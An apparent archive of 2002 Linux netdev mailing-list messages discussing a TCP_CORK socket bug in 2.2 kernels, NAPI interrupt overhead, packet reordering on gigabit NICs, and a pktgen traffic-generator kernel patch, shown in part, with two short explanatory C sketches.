Alan.Cox@linux.org Subject: Re: FIN_WAIT1 / TCP_CORK / 2.2 -- reproducible bug and test case From: "David S. 
Miller" In-Reply-To: <20020918020346.GA2285@samba.org> References: <20020918020346.GA2285@samba.org> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 242 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Which 2.2.x kernel exactly? You don't specify this. If it's old, please try to reproduce with more recent 2.2.x kernels, and even more importantly make sure 2.4.x does not exhibit this behavior. From jgarzik@mandrakesoft.com Tue Sep 17 19:06:47 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:06:54 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I26ktG001877 for ; Tue, 17 Sep 2002 19:06:47 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rUJe-000318-00; Wed, 18 Sep 2002 03:11:46 +0100 Message-ID: <3D87E0C2.6040004@mandrakesoft.com> Date: Tue, 17 Sep 2002 22:11:14 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. 
Miller" CC: akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <3D87A264.8D5F3AD2@digeo.com> <20020917.143947.07361352.davem@redhat.com> <3D87A4A2.6050403@mandrakesoft.com> <20020917.144911.43656989.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 243 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev David S. Miller wrote: > From: Jeff Garzik > Date: Tue, 17 Sep 2002 17:54:42 -0400 > > David S. Miller wrote: > > Any driver should be able to get the NAPI overhead to max out at > > 2 PIOs per packet. > > Just to pick nits... my example went from 2 or 3 IOs [depending on the > presence/absence of a work loop] to 6 IOs. > > I mean "2 extra PIOs" not "2 total PIOs". > > I think it's doable for just about every driver, even tg3 with it's > weird semaphore scheme takes 2 extra PIOs worst case with NAPI. > > The semaphore I have to ACK anyways at hw IRQ time anyways, and since > I keep a software copy of the IRQ masking register, mask and unmask > are each one PIO. You're looking at at least one extra get-irq-status too, at least in the classical 10/100 drivers I'm used to seeing... 
Jeff From mbp@samba.org Tue Sep 17 19:07:18 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:07:20 -0700 (PDT) Received: from sngrel5.hp.com (sngrel5.hp.com [192.6.86.210]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I27FtG002031 for ; Tue, 17 Sep 2002 19:07:17 -0700 Received: from ctss11.sgp.hp.com (ctss11.sgp.hp.com [15.85.49.5]) by sngrel5.hp.com (Postfix) with ESMTP id C125180 for ; Wed, 18 Sep 2002 10:12:14 +0800 (SGP) Received: from XAUBRG2.AUS.HP.COM (xaubrg2.aus.hp.com [15.23.69.43]) by ctss11.sgp.hp.com (8.9.3 (PHNE_18979)/8.9.3 SMKit6.0.6 OpenMail BPI enabled) with SMTP id KAA03694 for ; Wed, 18 Sep 2002 10:12:08 +0800 (SGP) Received: from 15.23.69.43 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Wed, 18 Sep 2002 12:10:14 +1000 Received: from XAUBRG2.AUS.HP.COM (localhost [127.0.0.1]) by XAUBRG2.AUS.HP.COM with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59) id SJWWT66M; Wed, 18 Sep 2002 12:10:14 +1000 Received: from 16.176.68.120 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Wed, 18 Sep 2002 12:10:14 +1000 Received: from mbp by vexed.aus.hp.com with local (Exim 3.36 #1 (Debian)) id 17rUHR-0000ov-00; Wed, 18 Sep 2002 12:09:29 +1000 Date: Wed, 18 Sep 2002 12:09:29 +1000 From: Martin Pool To: "David S. 
Miller" Cc: ak@muc.de, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, Alan.Cox@linux.org Subject: Re: FIN_WAIT1 / TCP_CORK / 2.2 -- reproducible bug and test case Message-ID: <20020918020927.GB2285@samba.org> References: <20020918020346.GA2285@samba.org> <20020917.185801.76605813.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020917.185801.76605813.davem@redhat.com> User-Agent: Mutt/1.4i X-GPG: 1024D/A0B3E88B: AFAC578F 1841EE6B FD95E143 3C63CA3F A0B3E88B X-archive-position: 244 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mbp@samba.org Precedence: bulk X-list: netdev On 17 Sep 2002, "David S. Miller" wrote: > > Which 2.2.x kernel exactly? The person who originally reported the bug to me tried .16 and .18, and I just reproduced it on .21, which was the most recent when I started investigating. I can try .22 or a .pre if you think it's already fixed somewhere. > You don't specify this. (Actually it was in the corked_demo.c comment header.) > If it's old, please try to reproduce with more recent 2.2.x > kernels, and even more importantly make sure 2.4.x does not > exhibit this behavior. I can't reproduce it on 2.4.18 or .19. It looked to me like tcp_snd_test() and related stuff had been substantially rewritten. 
-- Martin From davem@redhat.com Tue Sep 17 19:10:52 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:10:53 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I2AqtG002580 for ; Tue, 17 Sep 2002 19:10:52 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id TAA18317; Tue, 17 Sep 2002 19:06:41 -0700 Date: Tue, 17 Sep 2002 19:06:41 -0700 (PDT) Message-Id: <20020917.190641.84134530.davem@redhat.com> To: jgarzik@mandrakesoft.com Cc: akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads From: "David S. Miller" In-Reply-To: <3D87E0C2.6040004@mandrakesoft.com> References: <3D87A4A2.6050403@mandrakesoft.com> <20020917.144911.43656989.davem@redhat.com> <3D87E0C2.6040004@mandrakesoft.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 245 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Jeff Garzik Date: Tue, 17 Sep 2002 22:11:14 -0400 You're looking at at least one extra get-irq-status too, at least in the classical 10/100 drivers I'm used to seeing... How so? The number of ones done in the e1000 NAPI code are the same (read register until no interesting status bits remain set, same as pre-NAPI e1000 driver). For tg3 it's a cheap memory read from the status block not a PIO. 
From Andrew.Morton@digeo.com Tue Sep 17 19:11:31 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:11:33 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I2BVtG002846 for ; Tue, 17 Sep 2002 19:11:31 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id TAA08728 for ; Tue, 17 Sep 2002 19:16:25 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091719202918291 ; Tue, 17 Sep 2002 19:20:29 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 19:16:26 -0700 Received: from digeo.com ([172.17.144.18]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 19:16:25 -0700 Message-ID: <3D87E1F9.33909AC8@digeo.com> Date: Tue, 17 Sep 2002 19:16:25 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-rc5 i686) X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: hadi@cyberus.ca, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <20020917.180014.07882539.davem@redhat.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 18 Sep 2002 02:16:25.0821 (UTC) FILETIME=[63ECA8D0:01C25EB9] X-archive-position: 246 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev "David S. Miller" wrote: > > From: jamal > Date: Tue, 17 Sep 2002 20:57:58 -0400 (EDT) > > I am not so sure with that 6% difference there is no other bug lurking > there; 6% seems too large for an extra two PCI transactions per packet. 
> > {in,out}{b,w,l}() operations have a fixed timing, therefore his > results doesn't sound that far off. > > It is also one of the reasons I suspect Andrew saw such bad results > with 3c59x, but probably that is not the only reason. They weren't "very bad", iirc. Maybe a 5% increase in CPU load. It was all a long time ago. Will retest if someone sends URLs. From mbp@samba.org Tue Sep 17 19:27:21 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:27:25 -0700 (PDT) Received: from sngrel7.hp.com (sngrel7.hp.com [192.6.86.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I2RJtG003445 for ; Tue, 17 Sep 2002 19:27:20 -0700 Received: from ctss11.sgp.hp.com (ctss11.sgp.hp.com [15.85.49.5]) by sngrel7.hp.com (Postfix) with ESMTP id 618EE1CD for ; Wed, 18 Sep 2002 10:32:19 +0800 (SST) Received: from XAUBRG2.AUS.HP.COM (xaubrg2.aus.hp.com [15.23.69.43]) by ctss11.sgp.hp.com (8.9.3 (PHNE_18979)/8.9.3 SMKit6.0.6 OpenMail BPI enabled) with SMTP id KAA09732 for ; Wed, 18 Sep 2002 10:32:17 +0800 (SGP) Received: from 15.23.69.43 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Wed, 18 Sep 2002 12:30:58 +1000 Received: from XAUBRG2.AUS.HP.COM (localhost [127.0.0.1]) by XAUBRG2.AUS.HP.COM with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59) id T1AH97WC; Wed, 18 Sep 2002 12:30:58 +1000 Received: from 16.176.68.120 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Wed, 18 Sep 2002 12:30:57 +1000 Received: from mbp by vexed.aus.hp.com with local (Exim 3.36 #1 (Debian)) id 17rUbW-0000rM-00; Wed, 18 Sep 2002 12:30:14 +1000 Date: Wed, 18 Sep 2002 12:30:14 +1000 From: Martin Pool To: "David S. 
Miller" Cc: ak@muc.de, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, Alan.Cox@linux.org Subject: Re: FIN_WAIT1 / TCP_CORK / 2.2 -- reproducible bug and test case Message-ID: <20020918023012.GC2285@samba.org> References: <20020918020346.GA2285@samba.org> <20020917.185801.76605813.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020917.185801.76605813.davem@redhat.com> User-Agent: Mutt/1.4i X-GPG: 1024D/A0B3E88B: AFAC578F 1841EE6B FD95E143 3C63CA3F A0B3E88B X-archive-position: 247 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mbp@samba.org Precedence: bulk X-list: netdev For what it's worth, I can also reproduce the bug on 2.2.22rc3. It's on a non-SMP machine with a very standard kernel config, no firewalling, Debian 2.2. I'm testing it under VMWare, but the same symptoms were observed by other people on real hardware with Red Hat 6.2. It was originally noticed in distcc, and this test case is basically just a stripped-down version of the same code. If the program uncorks the socket before closing it, then it cleans up properly. However, if distcc is killed, then it can't do that and the problem occurs. (The most recent version makes an effort to always uncork, but obviously for e.g. SIGKILL it can't do much other than avoid corks entirely.) Some people observed a couple of hundred (?) sockets getting into this state. 
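A minimal sketch of the uncork-before-close pattern described above, assuming Linux and a TCP socket. The helper names set_cork and uncork_and_close are hypothetical and are not taken from distcc or corked_demo.c; only setsockopt() with TCP_CORK is the real interface.

```c
#include <assert.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: turn TCP_CORK on (1) or off (0) for a TCP socket.
 * Returns 0 on success, -1 on error (errno is set by setsockopt). */
static int set_cork(int fd, int on)
{
    return setsockopt(fd, IPPROTO_TCP, TCP_CORK, &on, sizeof(on));
}

/* Hypothetical helper: clear the cork so queued partial frames are pushed
 * out, then close the socket. The socket is closed even if uncorking
 * fails; the return value is -1 if either step failed. */
static int uncork_and_close(int fd)
{
    int rc;

    assert(fd >= 0);
    rc = set_cork(fd, 0);
    if (close(fd) < 0)
        return -1;
    return rc;
}
```

This only helps on exit paths the program controls. A process killed by SIGKILL never reaches uncork_and_close(), which is the case the message above says cannot be handled other than by avoiding corks entirely.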
-- Martin From jgarzik@mandrakesoft.com Tue Sep 17 19:32:08 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 19:32:10 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I2W7tG003807 for ; Tue, 17 Sep 2002 19:32:08 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rUiB-0003Sd-00; Wed, 18 Sep 2002 03:37:07 +0100 Message-ID: <3D87E6B4.80304@mandrakesoft.com> Date: Tue, 17 Sep 2002 22:36:36 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <3D87A4A2.6050403@mandrakesoft.com> <20020917.144911.43656989.davem@redhat.com> <3D87E0C2.6040004@mandrakesoft.com> <20020917.190641.84134530.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 248 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev David S. Miller wrote: > From: Jeff Garzik > Date: Tue, 17 Sep 2002 22:11:14 -0400 > > You're looking at at least one extra get-irq-status too, at least in the > classical 10/100 drivers I'm used to seeing... > > How so? The number of ones done in the e1000 NAPI code are the same > (read register until no interesting status bits remain set, same as > pre-NAPI e1000 driver). > > For tg3 it's a cheap memory read from the status block not a PIO. 
Non-NAPI: get-irq-stat ack-irq get-irq-stat (omit, if no work loop) NAPI: get-irq-stat ack-all-but-rx-irq mask-rx-irqs get-irq-stat (omit, if work loop) ... ack-rx-irqs get-irq-stat unmask-rx-irqs This is the low load / low latency case only. The number of IOs decreases at higher loads [obviously :)] From greearb@candelatech.com Tue Sep 17 21:02:21 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 21:02:24 -0700 (PDT) Received: from grok.yi.org (IDENT:beoLoRJnbAxxjLoVVVs/DEN0fd1/4mqM@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I42KtG007467 for ; Tue, 17 Sep 2002 21:02:21 -0700 Received: from candelatech.com (IDENT:J4Z6PZgJDNFY0fMOq38PR6w8aspVjhKg@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I46jv02580; Tue, 17 Sep 2002 21:06:46 -0700 Message-ID: <3D87FBD5.3030508@candelatech.com> Date: Tue, 17 Sep 2002 21:06:45 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jamal CC: Chris Friesen , Cacophonix , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 249 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev jamal wrote: > > On Tue, 17 Sep 2002, Ben Greear wrote: > > >>I have a program that sends and receives UDP packets with 32-bit sequence >>numbers. I can detect OOO packets if they fit into the last 10 packets >>received. If they are farther out of order than that, the code treats >>them as dropped.... 
>> > > > So let me understand this: > You have a packet going out eth0 looped back to eth0 and you are seeing I go out eth2 and come in eth3, both e1000 copper nics. > reordering? What sort of things are happening from departure at udp socket > to arrival on the other side? Are you doing anything funky yourself or > it is all kernel? I see reordering on regular old socket calls from user space, and I see the same thing with pktgen packets as well (which clears the stack of fault). For user space, I am binding to source IP, setting SO_BINDTODEVICE, and O_NONBLOCK. Nothing overly weird I believe. pktgen has its own ways, basically it grabs the pkts in the dev.c receive method near where the bridging code grabs its packets... I see no reordering at all with tulip 4-port nics and single processor machines. > > >>I used smp_afinity to tie a NIC to a CPU, and the napi patch for 2.4.20-pre7. > > > Did you get reordering with affinity? Yes. I'm not sure I tried affinity w/out NAPI though. I definitely tried it with NAPI and saw reordering. > > >>When sending and receiving 250Mbps of UDP/IP traffic (sending over cross-over >>cable to other NIC on same machine), I see the occasional OOO packet. I also >>see bogus dropped packets, which means sometimes the order is off by 10 or more >>packets.... > > > A lot of shit is happening at that rate in particular with PCI bus. If > i understood correctly a packet crosses the bus about 4 times? Two times I believe, but I'm sending in both directions, so there is about 1Gbps across the bus, not even counting the UDP, IP, and Ethernet headers. > > >>The other fun thing about this setup is that after running around 65 billion bytes >>with this test, the machine crashes with an OOPs. > > > No clue whats going on - probably a race somewhere and cant help since > i dont have this NIC but if you get Robert excited he might be able to > help you. He seems moderately interested, suggested I try the one in 2.5.[latest].
I'll be able to do that next week, assuming it's trivial to compile it for 2.4.19.... Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Tue Sep 17 23:35:20 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 23:35:30 -0700 (PDT) Received: from grok.yi.org (IDENT:DXYl8fr+/fJQ5w6vuFDmp7goG4vcaiVx@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I6ZDtG010135 for ; Tue, 17 Sep 2002 23:35:13 -0700 Received: from candelatech.com (IDENT:jwOuoErBg0FHPec9C1Sp8PbLS+VVoD/m@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I6eDv21722 for ; Tue, 17 Sep 2002 23:40:14 -0700 Message-ID: <3D881FCD.4040209@candelatech.com> Date: Tue, 17 Sep 2002 23:40:13 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: [PATCH] pktgen (1.6,-ben) Content-Type: multipart/mixed; boundary="------------030304010606000406080300" X-archive-position: 250 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------030304010606000406080300 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Here is an update of my pktgen patch. This patch is against 2.4.20-pre7. (I say my, because it is significantly different from the one in the kernel, and should not be confused with Robert's more official patches, Robert still gets primary credit for the idea and original code!) It provides traffic generation and reception features, including latency, out-of-order & dropped packet counters, and much more. 
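The receive-side accounting described earlier in the thread (32-bit sequence numbers, reordering detected only within the last 10 packets, anything later treated as dropped) might look roughly like the following. It is a user-space sketch under those assumptions, not the pktgen code; struct seq_tracker, seq_track and SEQ_WINDOW are hypothetical names, and duplicate packets are not accounted for.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SEQ_WINDOW 10u  /* assumed: how far behind a late packet may be */

/* Hypothetical per-flow receive state. */
struct seq_tracker {
    int      started;  /* 0 until the first packet is seen */
    uint32_t next;     /* next sequence number expected in order */
    uint64_t rx;       /* packets received */
    uint64_t ooo;      /* late packets that arrived inside the window */
    uint64_t dropped;  /* packets skipped and not (yet) seen */
};

/* Account for one received sequence number. */
static void seq_track(struct seq_tracker *t, uint32_t seq)
{
    int32_t delta;
    uint32_t behind;

    assert(t != NULL);
    t->rx++;

    if (!t->started) {
        t->started = 1;
        t->next = seq + 1;
        return;
    }

    /* Signed difference so that 32-bit wraparound is handled. */
    delta = (int32_t)(seq - t->next);

    if (delta == 0) {              /* in order */
        t->next++;
    } else if (delta > 0) {        /* gap: provisionally count as dropped */
        t->dropped += (uint32_t)delta;
        t->next = seq + 1;
    } else {                       /* late packet */
        behind = (t->next - 1) - seq;
        if (behind >= 1 && behind <= SEQ_WINDOW) {
            t->ooo++;              /* reordered, so it was not really lost */
            if (t->dropped > 0)
                t->dropped--;
        }
        /* Further behind than the window: it stays counted as dropped,
         * which is how reordering by more than 10 shows up as loss. */
    }
}
```

With this accounting, a packet that arrives more than SEQ_WINDOW positions late is never credited back, which matches the "bogus dropped packets" symptom reported in the bonding thread.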
This particular patch fixes a divide-by-zero bug in earlier patches I produced (only seen on machines running at less than 1Ghz). If anyone has an Intel GigE card or two, I would be interested if it could sustain pktgen (or other high speed) traffic for more than 6 hours. My machine crashes everytime! Enjoy, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear --------------030304010606000406080300 Content-Type: text/plain; name="pg_2.4.19.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="pg_2.4.19.patch" --- linux-2.4.19/include/linux/if.h Thu Nov 22 12:47:07 2001 +++ linux-2.4.19.dev/include/linux/if.h Sun Sep 15 21:56:34 2002 @@ -47,6 +47,12 @@ /* Private (from user) interface flags (netdevice->priv_flags). */ #define IFF_802_1Q_VLAN 0x1 /* 802.1Q VLAN device. */ +#define IFF_PKTGEN_RCV 0x2 /* Registered to receive & consume Pktgen skbs */ +#define IFF_ACCEPT_LOCAL_ADDRS 0x4 /** Accept pkts even if they come from a local + * address. This lets use send pkts to ourselves + * over external interfaces (when used in conjunction + * with SO_BINDTODEVICE + */ /* * Device mapping structure. I'd just gone off and designed a --- linux-2.4.19/include/linux/netdevice.h Fri Aug 2 17:39:45 2002 +++ linux-2.4.19.dev/include/linux/netdevice.h Sun Sep 15 21:56:35 2002 @@ -162,7 +162,7 @@ unsigned fastroute_deferred_out; unsigned fastroute_latency_reduction; unsigned cpu_collision; -} __attribute__ ((__aligned__(SMP_CACHE_BYTES))); +} ____cacheline_aligned; extern struct netif_rx_stats netdev_rx_stat[]; @@ -206,7 +206,8 @@ __LINK_STATE_START, __LINK_STATE_PRESENT, __LINK_STATE_SCHED, - __LINK_STATE_NOCARRIER + __LINK_STATE_NOCARRIER, + __LINK_STATE_RX_SCHED }; @@ -295,7 +296,9 @@ unsigned short flags; /* interface flags (a la BSD) */ unsigned short gflags; - unsigned short priv_flags; /* Like 'flags' but invisible to userspace. 
*/ + unsigned short priv_flags; /* Like 'flags' but invisible to userspace, + * see: if.h for flag definitions. + */ unsigned short unused_alignment_fixer; /* Because we need priv_flags, * and we want to be 32-bit aligned. */ @@ -330,6 +333,10 @@ void *ip6_ptr; /* IPv6 specific data */ void *ec_ptr; /* Econet specific data */ + struct list_head poll_list; /* Link to poll list */ + int quota; + int weight; + struct Qdisc *qdisc; struct Qdisc *qdisc_sleeping; struct Qdisc *qdisc_list; @@ -373,6 +380,8 @@ int (*stop)(struct net_device *dev); int (*hard_start_xmit) (struct sk_buff *skb, struct net_device *dev); +#define HAVE_NETDEV_POLL + int (*poll) (struct net_device *dev, int *quota); int (*hard_header) (struct sk_buff *skb, struct net_device *dev, unsigned short type, @@ -431,6 +440,7 @@ /* this will get initialized at each interface type init routine */ struct divert_blk *divert; #endif /* CONFIG_NET_DIVERT */ + }; @@ -492,9 +502,12 @@ int cng_level; int avg_blog; struct sk_buff_head input_pkt_queue; + struct list_head poll_list; struct net_device *output_queue; struct sk_buff *completion_queue; -} __attribute__((__aligned__(SMP_CACHE_BYTES))); + + struct net_device blog_dev; /* Sorry. 8) */ +} ____cacheline_aligned; extern struct softnet_data softnet_data[NR_CPUS]; @@ -547,6 +560,7 @@ return test_bit(__LINK_STATE_START, &dev->state); } + /* Use this variant when it is known for sure that it * is executing from interrupt context. 
*/ @@ -578,6 +592,8 @@ extern void net_call_rx_atomic(void (*fn)(void)); #define HAVE_NETIF_RX 1 extern int netif_rx(struct sk_buff *skb); +#define HAVE_NETIF_RECEIVE_SKB 1 +extern int netif_receive_skb(struct sk_buff *skb); extern int dev_ioctl(unsigned int cmd, void *); extern int dev_change_flags(struct net_device *, unsigned); extern void dev_queue_xmit_nit(struct sk_buff *skb, struct net_device *dev); @@ -699,6 +715,78 @@ #define netif_msg_hw(p) ((p)->msg_enable & NETIF_MSG_HW) #define netif_msg_wol(p) ((p)->msg_enable & NETIF_MSG_WOL) +/* Schedule rx intr now? */ + +static inline int netif_rx_schedule_prep(struct net_device *dev) +{ + return netif_running(dev) && + !test_and_set_bit(__LINK_STATE_RX_SCHED, &dev->state); +} + +/* Add interface to tail of rx poll list. This assumes that _prep has + * already been called and returned 1. + */ + +static inline void __netif_rx_schedule(struct net_device *dev) +{ + unsigned long flags; + int cpu = smp_processor_id(); + + local_irq_save(flags); + dev_hold(dev); + list_add_tail(&dev->poll_list, &softnet_data[cpu].poll_list); + if (dev->quota < 0) + dev->quota += dev->weight; + else + dev->quota = dev->weight; + __cpu_raise_softirq(cpu, NET_RX_SOFTIRQ); + local_irq_restore(flags); +} + +/* Try to reschedule poll. Called by irq handler. */ + +static inline void netif_rx_schedule(struct net_device *dev) +{ + if (netif_rx_schedule_prep(dev)) + __netif_rx_schedule(dev); +} + +/* Try to reschedule poll. Called by dev->poll() after netif_rx_complete(). + * Do not inline this? 
+ */ +static inline int netif_rx_reschedule(struct net_device *dev, int undo) +{ + if (netif_rx_schedule_prep(dev)) { + unsigned long flags; + int cpu = smp_processor_id(); + + dev->quota += undo; + + local_irq_save(flags); + list_add_tail(&dev->poll_list, &softnet_data[cpu].poll_list); + __cpu_raise_softirq(cpu, NET_RX_SOFTIRQ); + local_irq_restore(flags); + return 1; + } + return 0; +} + +/* Remove interface from poll list: it must be in the poll list + * on current cpu. This primitive is called by dev->poll(), when + * it completes the work. The device cannot be out of poll list at this + * moment, it is BUG(). + */ +static inline void netif_rx_complete(struct net_device *dev) +{ + unsigned long flags; + + local_irq_save(flags); + if (!test_bit(__LINK_STATE_RX_SCHED, &dev->state)) BUG(); + list_del(&dev->poll_list); + clear_bit(__LINK_STATE_RX_SCHED, &dev->state); + local_irq_restore(flags); +} + /* These functions live elsewhere (drivers/net/net_init.c, but related) */ extern void ether_setup(struct net_device *dev); @@ -723,6 +811,7 @@ extern int netdev_register_fc(struct net_device *dev, void (*stimul)(struct net_device *dev)); extern void netdev_unregister_fc(int bit); extern int netdev_max_backlog; +extern int weight_p; extern unsigned long netdev_fc_xoff; extern atomic_t netdev_dropping; extern int netdev_set_master(struct net_device *dev, struct net_device *master); --- linux-2.4.19/net/core/dev.c Fri Aug 2 17:39:46 2002 +++ linux-2.4.19.dev/net/core/dev.c Sun Sep 15 21:34:11 2002 @@ -1,4 +1,4 @@ -/* +/* -*-linux-c-*- * NET3 Protocol independent device support routines. * * This program is free software; you can redistribute it and/or @@ -109,6 +109,11 @@ #endif +#if defined(CONFIG_NET_PKTGEN) || defined(CONFIG_NET_PKTGEN_MODULE) +#include "pktgen.h" +#endif + + /* This define, if set, will randomly drop a packet when congestion * is more than moderate. 
